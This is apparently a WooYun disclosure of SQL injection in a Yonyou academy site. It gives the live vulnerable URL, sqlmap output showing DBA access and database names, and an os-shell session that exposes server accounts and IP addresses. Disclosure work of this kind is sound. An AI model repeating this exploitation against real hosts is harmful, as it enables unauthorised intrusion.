当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087300

漏洞标题:用友某分站SQL注入第四弹

相关厂商:用友软件

漏洞作者:

提交时间:2014-12-16 14:18

修复时间:2014-12-21 14:20

公开时间:2014-12-21 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-16: 细节已通知厂商并且等待厂商处理中
2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

继续一枚吧

详细说明:

SQL注入地址:

http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N


DBA权限:

[22:33:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:33:38] [INFO] testing if current user is DBA
current user is DBA: True
[22:33:38] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap
tput\academy.yonyou.com'
[*] shutting down at 22:33:38


表名:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:34:10] [INFO] fetching database names
[22:34:11] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] JYSTimber_px
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Timber_CP_EIS
[*] Timber_CP_ENT
[*] Timber_Exam_Gov
[*] Timber_Exam_Org_01
[*] Timber_Exam_Org_Wx
[*] Timber_Exam_Shangqi
[*] Timber_Exam_YL
[*] Timber_Live
[*] Timber_px
[*] Timber_PX_ENS
[*] Timber_PX_ENS2
[*] Timber_PX_ENS_AP
[*] Timber_PX_New_lexue_ceshi
[*] Timber_PX_New_YY
[*] Timber_PX_New_yy2
[*] Timber_PX_New_YY_Temp
[*] Timber_PX_YH
[*] Timber_PX_yonyou
[*] Timber_Tianming
[22:34:11] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\o
tput\academy.yonyou.com'
[*] shutting down at 22:34:11

漏洞证明:

可执行CMD命令进行提权:

os-shell> net user
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:30] [INFO] the SQL query used returns 8 entries
[22:35:31] [INFO] retrieved: " "
[22:35:31] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[22:35:31] [INFO] retrieved: "\\\\\\\\ ?????"
[22:35:31] [INFO] retrieved: " "
[22:35:31] [INFO] retrieved: "-----------------------------------------------..
[22:35:32] [INFO] retrieved: "Administrator \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?..
[22:35:32] [INFO] retrieved: "??????????????????"
[22:35:32] [INFO] retrieved: " "
[22:35:32] [INFO] retrieved: " "
command standard output:
---
\\ ?????
-------------------------------------------------------------------------------
Administrator \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Guest \?a0\?a0\?a0\?a
\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0
Administrator Guest
??????????????????
---
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:49] [INFO] the SQL query used returns 38 entries
[22:35:49] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: "Windows IP ??"
[22:35:50] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: "?????? ????:"
[22:35:51] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0IPv4 ?? . . . . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: "????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:54] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:54] [INFO] retrieved: " "
[22:35:54] [INFO] retrieved: "????? 6TO4 Adapter:"
[22:35:55] [INFO] retrieved: " "
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: "????? Teredo Tunneling Pseudo-Interface:"
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:57] [INFO] retrieved: " "
[22:35:58] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "Windows IP ??"
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "?????? ????:"
[22:36:00] [INFO] retrieved: " "
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
command standard output:
---
Windows IP ??
?????? ????:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
\?a0\?a0IPv4 ?? . . . . . . . . . . . . : 222.191.251.170
IPv4 ?? . . . . . . . . . . . . : 222.191.251.170
\?a0\?a0???? \?a0. . . . . . . . . . . . : 255.255.255.192
???? . . . . . . . . . . . . : 255.255.255.192
\?a0\?a0????. . . . . . . . . . . . . : 222.191.251.129
????. . . . . . . . . . . . . : 222.191.251.129
????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF9E4}:
\?a0\?a0???? \?a0. . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
????? 6TO4 Adapter:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa
IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa
\?a0\?a0????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
????? Teredo Tunneling Pseudo-Interface:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455
IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455
???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455
\?a0\?a0????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
Windows IP ??
?????? ????:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
---
os-shell>

修复方案:

修复 降权 过滤
再次辛苦了,北京的小伙伴

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-21 14:20

厂商回复:

最新状态:

暂无